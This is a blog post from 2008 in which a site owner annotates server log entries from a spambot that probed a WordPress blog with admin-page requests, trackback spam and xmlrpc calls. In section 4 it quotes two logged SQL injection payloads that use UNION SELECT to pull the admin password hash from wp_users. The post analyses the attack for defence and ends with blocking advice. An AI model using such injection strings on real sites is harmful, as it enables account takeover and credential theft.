An exceptionally dumb spambot from China visited my blog and tried to run several Wordpress vulnerabilities that might have worked once with ancient versions. Let me split its traces into several parts:

1. Checking for a no longer existing article and not quite understanding the difference between mod-rewrite fake directories and actual directories. Maybe this script was optimised for blogs who run Wordpress in its stock query string mode (which is brief but not really the most you can get from your blog search engine wise):

58.241.255.38 – - [13/Nov/2008:21:28:15 +0100] “HEAD /using-bbclone-with-wordpress-232-the-almost-easy-way/wp-admin/index.php HTTP/1.1″ 404 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:16 +0100] “GET /using-bbclone-with-wordpress-232-the-almost-easy-way/ HTTP/1.1″ 404 6045 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

I’m seeing this quite often and usually this is all that will happen. But not at this time…

2. Trying to mess around in the admin section and not figuring out that I restricted access to my own ip address ranges. Obviously the script has no handler for 403 responses and thus keeps on trying something which isn’t going to work…

58.241.255.38 – - [13/Nov/2008:21:28:18 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:19 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:20 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:21 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:22 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:23 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:24 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:25 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This silliness went on for a minute like this, apparently trying to exploit a long fixed vulnerability in Wordpress’ admin section.

3. It follows another try at exploiting an old security hole in the admin section (still not getting that access if forbidden….) before the script finally resorts to plugging trackback spam, which isn’t working either :-). Most people have turned off this feature in the interim, because spammers rendered this feature entirely useless and there are alternative means to learn about one’s backlinks.

58.241.255.38 – - [13/Nov/2008:21:29:11 +0100] “POST /wp-admin/admin-ajax.php HTTP/1.1″ 403 225 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:12 +0100] “GET /xmlrpc.php HTTP/1.1″ 200 42 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:13 +0100] “POST /xmlrpc.php HTTP/1.1″ 200 774 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:14 +0100] “POST /wp-trackback.php?tb_id=1 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

4. Attempts at an SQL injection

58.241.255.38 – - [13/Nov/2008:21:29:16 +0100] “GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+
wp_users+where+id=1/* HTTP/1.1″ 301 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:17 +0100] “GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+
FROM+wp_users+where+id=1/* HTTP/1.1″ 301 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This has already been fixed for a while and is designed to compromise the admin account (user id=1). Spammers use this for adding or modifying content on a compromised site which then will be spamvertised via blogspam or, if the site attracts enough traffic, for running exploits via inserted iframes.

5. Looking for non-existing trackbacks

58.241.255.38 – - [13/Nov/2008:21:29:18 +0100] “GET /wp-trackback.php?p=1 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:19 +0100] “GET /wp-trackback.php?p=2 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:20 +0100] “GET /wp-trackback.php?p=3 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:21 +0100] “GET /wp-trackback.php?p=4 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:23 +0100] “GET /wp-trackback.php?p=5 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This went on till “p” reached the value 25 and was entirely useless because even if trackbacks were enabled, the request was malformed (lacking an id).

6. Repeating trackback spam attempts that didn’t work out before…

58.241.255.38 – - [13/Nov/2008:21:29:48 +0100] “GET /xmlrpc.php HTTP/1.1″ 200 42 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:50 +0100] “POST /xmlrpc.php HTTP/1.1″ 200 473 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

The host 58.241.255.38 is located in China and looks like a compromised machine nobody bothers to fix:
http://www.google.com/search?q=58.241.255.38

route:        58.240.0.0/15
origin:       AS4837
descr:        CHINA169-BACKBONE CNCGROUP China169 Backbone
lastupd-frst: 2008-05-19 12:06Z  202.249.2.169@rrc06
lastupd-last: 2008-11-13 13:38Z  193.232.244.111@rrc13
seen-at:      rrc00,rrc01,rrc03,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,
              rrc14,rrc15,rrc16
num-rispeers: 113
source:       RISWHOIS

The script itself, as indicated by its user agent and modus operandi, has been seen for a while at different occasions:
http://www.google.com/search?q=k1b+compatible%3B+rss+6.0%3B+Windows+Sot+5.1+Security+Kol

Blocking the user agent via SetEnvIf/Rewrite rules should already take care of the problem. Additionally firewalling or denying access for this unmaintained machine may be a good idea, too.